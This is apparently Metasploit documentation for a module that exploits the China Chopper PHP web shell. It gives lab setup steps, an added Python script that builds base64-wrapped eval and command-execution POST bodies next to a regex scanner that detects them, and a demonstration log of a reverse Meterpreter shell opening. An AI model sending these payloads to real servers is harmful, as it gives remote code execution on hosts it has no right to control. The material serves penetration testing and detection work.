/documentation/modules/exploit/multi/http/caidao_php_backdoor_exec.md
China Chopper, also called Caidao or simply [Chinese Caidao](https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html), is a web shell: a Windows client (the Caidao manager) drives a very small server-side backdoor. This module targets the PHP variant of that backdoor and turns it into a Metasploit session.

## Vulnerable Application

The [PHP code](https://github.com/rapid7/metasploit-framework/files/430643/caidao.zip) of the backdoor is attached. Extract it and save it as `caidao.php` in the document root of a PHP-enabled web server that you control for testing.

## Verification Steps

1. Install the application (`caidao.php` reachable over HTTP, see above)
2. Start msfconsole
3. Do: `use exploit/multi/http/caidao_php_backdoor_exec`
4. Do: `set rport <port>`
5. Do: `set rhost <ip>`
6. Do: `check`
   ```
   [+] 192.168.1.103:80 - The target is vulnerable.
   ```
7. Do: `exploit`
8. You should get a shell.

## Options

**TARGETURI**

TARGETURI by default is `/caidao.php`, which is the common filename of the backdoor.

**PASSWORD**

PASSWORD by default is `chopper`, which is the password of the backdoor. The password is the name of the POST form field the backdoor reads its PHP code from, so it must match whatever the dropped `caidao.php` uses.

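The following is an added example, not code from the Metasploit module or from the Caidao project. It shows the shape of the requests behind the `check` and `exploit` steps above, using the documented defaults (`/caidao.php`, `chopper`), and pairs them with a small defender-side scanner that flags the same traffic in a constructed sample of logged POST bodies. It assumes the backdoor is the classic one-liner `<?php @eval($_POST['chopper']); ?>`, so the form field named after the PASSWORD option carries PHP source that the server evaluates; the token-echo check is a plausible way to verify that, not a claim about the module's exact implementation. Nothing is sent over the network.

```python
import base64
import re
import secrets
import string
from urllib.parse import parse_qs, urlencode

# Module defaults from the documentation above.
TARGETURI = "/caidao.php"
PASSWORD = "chopper"


def random_token(length=10):
    """Random alphabetic marker used to prove that eval() really ran."""
    return "".join(secrets.choice(string.ascii_letters) for _ in range(length))


def php_single_quoted(text):
    """Escape text for use inside a PHP single-quoted string literal."""
    return "'" + text.replace("\\", "\\\\").replace("'", "\\'") + "'"


def build_check_body(password, token):
    """Form body for a check step (assumed technique): the backdoor eval()s the
    value of the field named after the password, so asking it to echo a random
    token and finding that token in the response proves code execution."""
    return urlencode({password: f"echo {php_single_quoted(token)};"})


def build_exec_body(password, command):
    """Form body that runs an OS command. China Chopper clients wrap the PHP in
    @eval(base64_decode('...')) so the command does not appear in cleartext."""
    php = f"system({php_single_quoted(command)});"
    encoded = base64.b64encode(php.encode()).decode()
    return urlencode({password: f"@eval(base64_decode('{encoded}'));"})


def target_is_vulnerable(response_body, token):
    """The decision a check has to make: did our token come back in the page?"""
    return token in response_body


# --- defender side: flag form bodies that carry China Chopper style payloads ---

EVAL_B64_RE = re.compile(r"^@?eval\(base64_decode\('([A-Za-z0-9+/=]+)'\)\)", re.I)
RAW_CALL_RE = re.compile(r"^(echo|system|passthru|shell_exec|exec)\s*[('\"]", re.I)


def chopper_indicators(raw_body):
    """Return (field, reason) pairs for every form value that looks like PHP
    source aimed at an eval() backdoor. The base64 wrapper is decoded so an
    analyst sees the real command rather than the blob."""
    hits = []
    for field, values in parse_qs(raw_body, keep_blank_values=True).items():
        for value in values:
            value = value.strip()
            m = EVAL_B64_RE.match(value)
            if m:
                decoded = base64.b64decode(m.group(1)).decode("utf-8", errors="replace")
                hits.append((field, f"eval(base64_decode()) wrapper, decodes to: {decoded}"))
            elif RAW_CALL_RE.match(value):
                hits.append((field, f"raw PHP call in form value: {value}"))
    return hits


# Constructed sample of POST bodies, as a WAF or reverse proxy might log them.
SAMPLE_BODIES = [
    "user=alice&comment=hello+world",          # benign
    build_check_body(PASSWORD, "LkTzQwErTy"),   # what a check step sends
    build_exec_body(PASSWORD, "id"),            # what an operator sends
    "pass=secret123&remember=1",                # benign
]


def scan(bodies):
    """Indices of the bodies that carry at least one indicator."""
    return [i for i, body in enumerate(bodies) if chopper_indicators(body)]


if __name__ == "__main__":
    token = random_token()
    print("POST", TARGETURI, "body:", build_check_body(PASSWORD, token))
    for i in scan(SAMPLE_BODIES):
        print(i, chopper_indicators(SAMPLE_BODIES[i]))
```

Note that the field name is the only "authentication" the backdoor has: anyone who learns or guesses the password (and `chopper` is the shipped default) gets the same code execution the module uses, which is why a dropped `caidao.php` should be treated as a full compromise of the web server account rather than as a vulnerability to patch.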
## Demonstration

```
msf exploit(caidao_php_backdoor_exec) > exploit
[*] Started reverse handler on 192.168.1.108:4444
[*] Sending stage (33068 bytes) to 192.168.1.103
[*] Meterpreter session 2 opened (192.168.1.108:4444 -> 192.168.1.103:42349) at 2015-11-02 09:05:54 +0000
meterpreter > sysinfo
Computer    : kali
OS          : Linux kali 3.14-kali1-686-pae #1 SMP Debian 3.14.5-1kali1 (2014-06-07) i686
Meterpreter : php/php
```